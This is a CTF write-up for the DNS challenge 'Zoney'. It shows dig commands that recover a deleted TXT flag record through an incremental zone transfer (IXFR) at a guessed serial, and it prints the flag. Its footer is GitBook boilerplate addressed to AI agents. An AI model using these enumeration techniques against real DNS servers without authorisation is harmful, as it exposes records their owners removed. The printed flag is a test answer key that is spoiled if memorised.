> For the complete documentation index, see [llms.txt](https://lance-kenji.gitbook.io/me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/misc/zoney.md). # Zoney **Category:** Misc (DNS / Recon) **Difficulty:** Medium #### 1. Challenge Overview The challenge provided a DNS server at `52.59.124.14:5054` for the domain `flag.ctf.nullcon.net`. The author hinted that the flag was hidden and challenged me to "show that I know all about DNS." #### 2. Vulnerability Analysis **Step 1: Initial Reconnaissance** I started by checking for the flag in standard `TXT` records at the apex. ```bash dig @52.59.124.14 -p 5054 TXT flag.ctf.nullcon.net ``` **Result:** `flag.ctf.nullcon.net. 300 IN TXT "The flag was removed."` The server claimed the flag was gone, but the presence of a custom message suggested it might still be accessible through advanced DNS features. **Step 2: Failed Enumeration Attempts** I attempted several standard DNS exploitation techniques, all of which were unsuccessful: * **Zone Transfer (AXFR):** `dig @52.59.124.14 -p 5054 AXFR flag.ctf.nullcon.net` — Result: `; Transfer failed.` * **DNSSEC Walking:** Querying for non-existent records with `+dnssec` did not return `NSEC` records, meaning the zone wasn't "walkable" like the previous challenge. * **Chaos Class (CH):** Querying `CH TXT flag.ctf.nullcon.net` returned the same "flag was removed" message. * **EDNS Client Subnet:** Testing with `+subnet=127.0.0.1` and other subnets did not change the output. **Step 3: Investigating Zone History (IXFR)** I checked the **SOA (Start of Authority)** record to see the serial number: ```bash dig @52.59.124.14 -p 5054 SOA flag.ctf.nullcon.net ``` **Result:** Serial was `1500`. This indicated the zone had undergone many updates. I tested an **Incremental Zone Transfer (IXFR)** to see the changes between version `1499` and `1500`: ```bash dig @52.59.124.14 -p 5054 IXFR=1499 flag.ctf.nullcon.net ``` **Discovery:** The response showed the admin explicitly removing a record: `flag.ctf.nullcon.net. 300 IN TXT "Phew, removed the flag before anyone could get it"` #### 3. Developing the Exploit Since the flag was "removed" in version 1499, it had to exist in an earlier version. In CTF environments, specific "leet" numbers are often used for significant updates. I targeted serial **1337** to see the state of the zone at that specific point in history. #### 4. The Solution Script (Manual Command) The winning command requested the incremental changes starting from version 1337. ```bash dig @52.59.124.14 -p 5054 IXFR=1337 flag.ctf.nullcon.net ``` #### 5. The Winning Payload The server responded with the diff starting from serial 1337, revealing the original record: ```plaintext flag.ctf.nullcon.net. 300 IN SOA ns.ctf.nullcon.net. admin.ctf.nullcon.net. 1337 3600 1800 604800 86400 flag.ctf.nullcon.net. 300 IN A 10.13.37.1 flag.ctf.nullcon.net. 300 IN TXT "Update #1337: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}" ``` #### 6. Result * **Flag:** `ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}` * **Lessons Learned:** DNS servers often maintain a history of zone updates. If a record is deleted, it may still be retrievable using `IXFR` if the attacker can guess or brute-force the serial number of a previous version. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/misc/zoney.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.